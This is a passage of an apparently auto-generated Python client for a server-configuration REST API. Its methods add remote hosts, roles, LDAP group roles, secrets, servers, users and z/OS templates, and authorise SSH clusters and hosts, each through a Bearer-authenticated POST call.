    Add a remote host to Server.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_remote_host(server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the remote host is going to be added to. (required)
    :param AddRemoteHostParams body: The non default, advanced configuration data
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_remote_host_with_http_info(server, **kwargs)  # noqa: E501
def add_remote_host_with_http_info(self, server, **kwargs):  # noqa: E501
    """add remote host to Server  # noqa: E501

    Add a remote host to Server.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_remote_host_with_http_info(server, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server the remote host is going to be added to. (required)
    :param AddRemoteHostParams body: The non default, advanced configuration data
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.  `body` is
    # optional here: it is only present in params when the caller passed it.
    all_params = [
        'server', 'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_remote_host" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'server' is set
    if params.get('server') is None:
        raise ValueError("Missing the required parameter `server` when calling `add_remote_host`")  # noqa: E501

    collection_formats = {}

    # Path placeholder: /config/server/{server}/remotehost
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/server/{server}/remotehost', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_role(self, role_file, **kwargs):  # noqa: E501
    """Add Authorization Role  # noqa: E501

    Add Authorization Role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role(role_file, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role_file: (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_role_with_http_info(role_file, **kwargs)  # noqa: E501
def add_role_with_http_info(self, role_file, **kwargs):  # noqa: E501
    """Add Authorization Role  # noqa: E501

    Add Authorization Role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role_with_http_info(role_file, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str role_file: (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'role_file',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_role" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'role_file' is set
    if params.get('role_file') is None:
        raise ValueError("Missing the required parameter `role_file` when calling `add_role`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []
    header_params = {}
    form_params = []
    # The role file is uploaded as multipart form data under `roleFile`.
    local_var_files = {}
    if 'role_file' in params:
        local_var_files['roleFile'] = params['role_file']  # noqa: E501

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['multipart/form-data'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/authorization/role', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_role_to_ldap_group(self, ldapgroup, role, **kwargs):  # noqa: E501
    """Add a role to LDAP group  # noqa: E501

    Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role_to_ldap_group(ldapgroup, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ldapgroup: Name of LDAP group (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs)  # noqa: E501
def add_role_to_ldap_group_with_http_info(self, ldapgroup, role, **kwargs):  # noqa: E501
    """Add a role to LDAP group  # noqa: E501

    Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role_to_ldap_group_with_http_info(ldapgroup, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str ldapgroup: Name of LDAP group (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'ldapgroup', 'role',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_role_to_ldap_group" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameters are set
    if params.get('ldapgroup') is None:
        raise ValueError("Missing the required parameter `ldapgroup` when calling `add_role_to_ldap_group`")  # noqa: E501
    if params.get('role') is None:
        raise ValueError("Missing the required parameter `role` when calling `add_role_to_ldap_group`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: /config/authorization/ldap/{ldapgroup}/role/{role}
    path_params = {}
    if 'ldapgroup' in params:
        path_params['ldapgroup'] = params['ldapgroup']  # noqa: E501
    if 'role' in params:
        path_params['role'] = params['role']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/authorization/ldap/{ldapgroup}/role/{role}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_role_to_user(self, user, role, **kwargs):  # noqa: E501
    """Add a role to user  # noqa: E501

    Add a role to user so that user will inherit role authorization  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role_to_user(user, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user: Name of user (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_role_to_user_with_http_info(user, role, **kwargs)  # noqa: E501
def add_role_to_user_with_http_info(self, user, role, **kwargs):  # noqa: E501
    """Add a role to user  # noqa: E501

    Add a role to user so that user will inherit role authorization  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_role_to_user_with_http_info(user, role, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user: Name of user (required)
    :param str role: Name of role (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'user', 'role',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_role_to_user" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameters are set
    if params.get('user') is None:
        raise ValueError("Missing the required parameter `user` when calling `add_role_to_user`")  # noqa: E501
    if params.get('role') is None:
        raise ValueError("Missing the required parameter `role` when calling `add_role_to_user`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: /config/authorization/user/{user}/role/{role}
    path_params = {}
    if 'user' in params:
        path_params['user'] = params['user']  # noqa: E501
    if 'role' in params:
        path_params['role'] = params['role']  # noqa: E501

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/authorization/user/{user}/role/{role}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_secret(self, body, **kwargs):  # noqa: E501
    """Add a new secret  # noqa: E501

    Add a new secret to the secrets vault.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_secret(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SecretKeyValue body: The new secret value (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Request deserialized data only and delegate; *_with_http_info itself
    # decides between a synchronous result and a request thread based on
    # the async_req flag, so one call handles both modes.
    kwargs['_return_http_data_only'] = True
    return self.add_secret_with_http_info(body, **kwargs)  # noqa: E501
def add_secret_with_http_info(self, body, **kwargs):  # noqa: E501
    """Add a new secret  # noqa: E501

    Add a new secret to the secrets vault.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_secret_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param SecretKeyValue body: The new secret value (required)
    :return: SuccessData
    If the method is called asynchronously,
    returns the request thread.
    """
    # Endpoint parameters plus the common per-request options.
    all_params = [
        'body',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    params = locals()
    # Reject unknown keyword arguments, then flatten **kwargs into params.
    # dict.items() iterates correctly on both Python 2 and 3.
    for key, val in params['kwargs'].items():
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_secret" % key
            )
        params[key] = val
    del params['kwargs']

    # verify the required parameter 'body' is set
    if params.get('body') is None:
        raise ValueError("Missing the required parameter `body` when calling `add_secret`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    return self.api_client.call_api(
        '/config/secret', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_server(self, body, **kwargs):  # noqa: E501
    """add server to the system  # noqa: E501

    Add a Server. This command setting up new server in the system  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_server(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param AddServerParams body: (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.add_server_with_http_info(body, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.add_server_with_http_info(body, **kwargs)  # noqa: E501
    return response
def add_server_with_http_info(self, body, **kwargs):  # noqa: E501
    """add server to the system  # noqa: E501
    Add a Server. This command setting up new server in the system  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_server_with_http_info(body, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param AddServerParams body: (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['body']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self, body, kwargs) so that all
    # parameters can be consumed uniformly by name below; this must run
    # before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_server" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_server`")  # noqa: E501

    collection_formats = {}

    # No path or query parameters for this endpoint; the payload travels
    # entirely in the request body.
    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_user(self, user_file, **kwargs):  # noqa: E501
    """Add user  # noqa: E501

    Add user  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_user(user_file, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str user_file: (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.add_user_with_http_info(user_file, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.add_user_with_http_info(user_file, **kwargs)  # noqa: E501
    return response
def add_user_with_http_info(self, user_file, **kwargs):  # noqa: E501
    """Add user  # noqa: E501
    Add user  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_user_with_http_info(user_file, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str user_file: (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['user_file']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self, user_file, kwargs) so that
    # all parameters can be consumed uniformly by name below; this must
    # run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_user" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'user_file' is set
    if ('user_file' not in params or
            params['user_file'] is None):
        raise ValueError("Missing the required parameter `user_file` when calling `add_user`")  # noqa: E501

    collection_formats = {}

    path_params = {}

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}
    # The user file is uploaded as a multipart form part, not as a body.
    if 'user_file' in params:
        local_var_files['userFile'] = params['user_file']  # noqa: E501

    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['multipart/form-data'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/authorization/user', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def add_zos_template(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Add z/OS Template  # noqa: E501

    Add z/OS Template  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_zos_template(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ZosTemplateData body: z/OS Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.add_zos_template_with_http_info(body, server, agent, template_name, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.add_zos_template_with_http_info(body, server, agent, template_name, **kwargs)  # noqa: E501
    return response
def add_zos_template_with_http_info(self, body, server, agent, template_name, **kwargs):  # noqa: E501
    """Add z/OS Template  # noqa: E501
    Add z/OS Template  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.add_zos_template_with_http_info(body, server, agent, template_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param ZosTemplateData body: z/OS Template Data (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str template_name: The z/OS Template Name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['body', 'server', 'agent', 'template_name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self plus the positional args and
    # kwargs) so that all parameters can be consumed uniformly by name
    # below; this must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method add_zos_template" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `add_zos_template`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `add_zos_template`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `add_zos_template`")  # noqa: E501
    # verify the required parameter 'template_name' is set
    if ('template_name' not in params or
            params['template_name'] is None):
        raise ValueError("Missing the required parameter `template_name` when calling `add_zos_template`")  # noqa: E501

    collection_formats = {}

    # URL template placeholders; note snake_case 'template_name' maps to
    # the camelCase '{templateName}' path segment.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    if 'template_name' in params:
        path_params['templateName'] = params['template_name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/zostemplate/{templateName}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def authorize_mft_ssh_cluster(self, body, server, agent, cluster_name, **kwargs):  # noqa: E501
    """Authorize SSH Cluster  # noqa: E501

    Authorize SSH Cluster  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_mft_ssh_cluster(body, server, agent, cluster_name, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param ClusterAuthorizationData body: File with content of hostnames and ports (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str cluster_name: Ssh Cluster Name (required)
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, **kwargs)  # noqa: E501
    return response
def authorize_mft_ssh_cluster_with_http_info(self, body, server, agent, cluster_name, **kwargs):  # noqa: E501
    """Authorize SSH Cluster  # noqa: E501
    Authorize SSH Cluster  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_mft_ssh_cluster_with_http_info(body, server, agent, cluster_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param ClusterAuthorizationData body: File with content of hostnames and ports (required)
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str cluster_name: Ssh Cluster Name (required)
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['body', 'server', 'agent', 'cluster_name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self plus the positional args and
    # kwargs) so that all parameters can be consumed uniformly by name
    # below; this must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method authorize_mft_ssh_cluster" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'body' is set
    if ('body' not in params or
            params['body'] is None):
        raise ValueError("Missing the required parameter `body` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
        raise ValueError("Missing the required parameter `server` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
    # verify the required parameter 'agent' is set
    if ('agent' not in params or
            params['agent'] is None):
        raise ValueError("Missing the required parameter `agent` when calling `authorize_mft_ssh_cluster`")  # noqa: E501
    # verify the required parameter 'cluster_name' is set
    if ('cluster_name' not in params or
            params['cluster_name'] is None):
        raise ValueError("Missing the required parameter `cluster_name` when calling `authorize_mft_ssh_cluster`")  # noqa: E501

    collection_formats = {}

    # URL template placeholders; note snake_case 'cluster_name' maps to
    # the camelCase '{clusterName}' path segment.
    path_params = {}
    if 'server' in params:
        path_params['server'] = params['server']  # noqa: E501
    if 'agent' in params:
        path_params['agent'] = params['agent']  # noqa: E501
    if 'cluster_name' in params:
        path_params['clusterName'] = params['cluster_name']  # noqa: E501

    query_params = []

    header_params = {}

    form_params = []
    local_var_files = {}

    body_params = None
    if 'body' in params:
        body_params = params['body']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['*/*'])  # noqa: E501

    # Authentication setting
    auth_settings = ['Bearer']  # noqa: E501

    # Dispatch the REST call through the shared ApiClient.
    return self.api_client.call_api(
        '/config/server/{server}/agent/{agent}/mft/ssh/cluster/{clusterName}', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='SuccessData',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def authorize_mft_ssh_host(self, server, agent, hostname, **kwargs):  # noqa: E501
    """Authorize SSH Host  # noqa: E501

    Authorize SSH Host for SFTP account  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_mft_ssh_host(server, agent, hostname, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str hostname: Ssh Hostname (required)
    :param str port: Ssh port for the relevant host
    :return: SuccessData
             If the method is called asynchronously,
             returns the request thread.
    """
    # Callers of this convenience wrapper only want the deserialized
    # payload, so force the data-only flag before delegating.
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        return self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs)  # noqa: E501
    # Synchronous path: unwrap and hand back the response data.
    response = self.authorize_mft_ssh_host_with_http_info(server, agent, hostname, **kwargs)  # noqa: E501
    return response
def authorize_mft_ssh_host_with_http_info(self, server, agent, hostname, **kwargs):  # noqa: E501
    """Authorize SSH Host  # noqa: E501
    Authorize SSH Host for SFTP account  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.authorize_mft_ssh_host_with_http_info(server, agent, hostname, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str server: The Server (required)
    :param str agent: The Agent (required)
    :param str hostname: Ssh Hostname (required)
    :param str port: Ssh port for the relevant host
    :return: SuccessData
        If the method is called asynchronously,
        returns the request thread.
    """
    # 'port' is an accepted optional keyword (sent as a query parameter).
    all_params = ['server', 'agent', 'hostname', 'port']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    # Snapshot the current local names (self plus the positional args and
    # kwargs) so that all parameters can be consumed uniformly by name
    # below; this must run before any other local is introduced.
    params = locals()
    # Reject unknown keyword arguments; fold accepted ones into params.
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method authorize_mft_ssh_host" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'server' is set
    if ('server' not in params or
            params['server'] is None):
